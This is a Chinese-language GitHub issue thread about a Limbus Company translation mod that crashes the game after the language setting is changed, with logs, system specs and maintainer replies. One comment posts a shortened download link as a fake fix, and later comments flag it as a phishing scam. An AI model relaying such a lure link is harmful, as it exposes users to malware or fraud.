### ISSUE TITLE
在设置界面修改语言会导致汉化以及游戏崩溃

### ISSUE THREAD

**Issue by kong-que-dnf123** [LocalizeLimbusCompany/LocalizeLimbusCompany#269]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 bug 已被修复的情况
- [X] 我使用的汉化补丁版本已为最新版

### 问题描述

在开启汉化后在设置中修改语言为其他语言
随后重新开启游戏
此时游戏会在进入游戏主页面前的任意位置卡住随后闪退（通常都是在月亮计划公司logo出现后黑屏时闪退但刚刚还触发了在登陆界面闪退...）
仅有重新覆盖安装汉化才能正常

### 日志文件

因为在游戏开始时便闪退 所以日志十分简短（以及我并非能发现问题位置
[Player(游戏日志).log](https://github.com/user-attachments/files/17058001/Player.log)
[Latest(框架日志).log](https://github.com/user-attachments/files/17057994/Latest.log)

### 截图

（闪退前的最后信息，在此之后这份cmd框便没有出现其他东西
![image](https://github.com/user-attachments/assets/b74028e7-00db-4b58-a320-f827a1f69d05)
根据截图 似乎切换语言之后会导致某个功能被禁用导致无法启用汉化...?

### 还有别的吗？

工具箱方面：
...工具箱没写版本号...但是
<details>
<summary>工具箱内部部分日志</summary>

```
记录时间：2024-09-19 18:57:24,621 日志级别：INFO  - 描述：WPF架构工具箱 版本：1.0.1 。
记录时间：2024-09-19 18:57:24,624 日志级别：INFO  - 描述：刷新页面状态中。
记录时间：2024-09-19 18:57:24,626 日志级别：INFO  - 描述：刷新页面状态完成。
记录时间：2024-09-19 18:57:24,890 日志级别：INFO  - 描述：正在检查工具箱更新。
记录时间：2024-09-19 18:57:25,028 日志级别：INFO  - 描述：加载程序配置。
记录时间：2024-09-19 18:57:25,030 日志级别：INFO  - 描述：跳过路径检查：True
记录时间：2024-09-19 18:57:25,030 日志级别：INFO  - 描述：路径：C:\Program Files (x86)\Steam\steamapps\common\Limbus Company
记录时间：2024-09-19 18:57:25,063 日志级别：INFO  - 描述：跳过检查路径。
记录时间：2024-09-19 18:57:25,064 日志级别：INFO  - 描述：边狱公司路径：C:\Program Files (x86)\Steam\steamapps\common\Limbus Company
记录时间：2024-09-19 18:57:25,066 日志级别：INFO  - 描述：加载流程完成。
记录时间：2024-09-19 18:57:25,320 日志级别：INFO  - 描述：最新安装器tag：1.0.1
记录时间：2024-09-19 18:57:25,320 日志级别：INFO  - 描述：没有更新。
```
---
</details>

此电脑配置：
版本	Windows 11 家庭中文版
版本号	23H2
安装日期	‎2022/‎10/‎22
操作系统版本	22631.4169
体验	Windows Feature Experience Pack 1000.22700.1034.0
设备名称	Peacock-Que-SERQMRB(修改过
处理器	11th Gen Intel(R) Core(TM) i5-1135G7 @ 2.40GHz   2.42 GHz
机带 RAM	16.0 GB (15.7 GB 可用)
设备 ID	885E778F-4C98-4D13-9E1A-C49CE16BB1BA
产品 ID	00342-36386-72248-AAOEM
系统类型	64 位操作系统, 基于 x64 的处理器
笔和触控	没有可用于此显示器的笔或触控输入
制造商	Lenovo

**Comment by ArthurMLi** [comment]
download
https://bit.ly/3TyLBMS
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ZengXiaoPi** [comment]
警告，为了防止我封号，所以我不删，但是 
**不要动上面的链接，这是诈骗**

**不要动上面的链接，这是诈骗**

**不要动上面的链接，这是诈骗**

**Comment by ZengXiaoPi** [comment]
后来的人也不要回复上面那条消息，也会封号

关于问题：此问题已被反映多次，但无法复现，因此无法修复。

**Comment by N071** [comment]
钓鱼链接已被删除
The phishing link is deleted.
——
这个问题我们在前一阵子就有收到过反馈，但是开发者这边没法复现。虽然我们确实收到了不少反馈但是如果我们自己不能复现的话其实就很难修……
推测是兼容性问题，建议先不要用这个功能了。添麻烦了实在抱歉~

**Comment by N071** [comment]
呃另外这个问题应该是模组的问题，跟工具箱没关系。
模组的log有两个，在`Limbus Company\BepInEx`文件夹里应该有两个txt，分别是`ErrorLog.log`和`LogOutput.log`。方便找一下这俩吗？

**Comment by kong-que-dnf123** [comment]
[ErrorLog.log](https://github.com/user-attachments/files/17058369/ErrorLog.log)
[LogOutput.log](https://github.com/user-attachments/files/17058370/LogOutput.log)
以及：此次闪退时的cmd窗口信息并没有上次截图中的最后三行 因为当时这个issue点完我就点了一次工具箱的重新安装（虽然工具箱似乎没下载读条就告诉我安装完了）

**Comment by N071** [comment]
噢工具箱安装不读条是因为我们有版本检测，是同个版本的话就不下载安装，所以也就不读条了。这个时候如果要重装就得先卸载再安装，否则直接点一键安装是没用的。
那总之帮大忙了，我们的模组开发者会来检查这个问题的。

那我就reopen这个issue了

**Comment by Nephthys137** [comment]
令人遗憾的是,我连问题发生在哪都不知道,更别提修复了
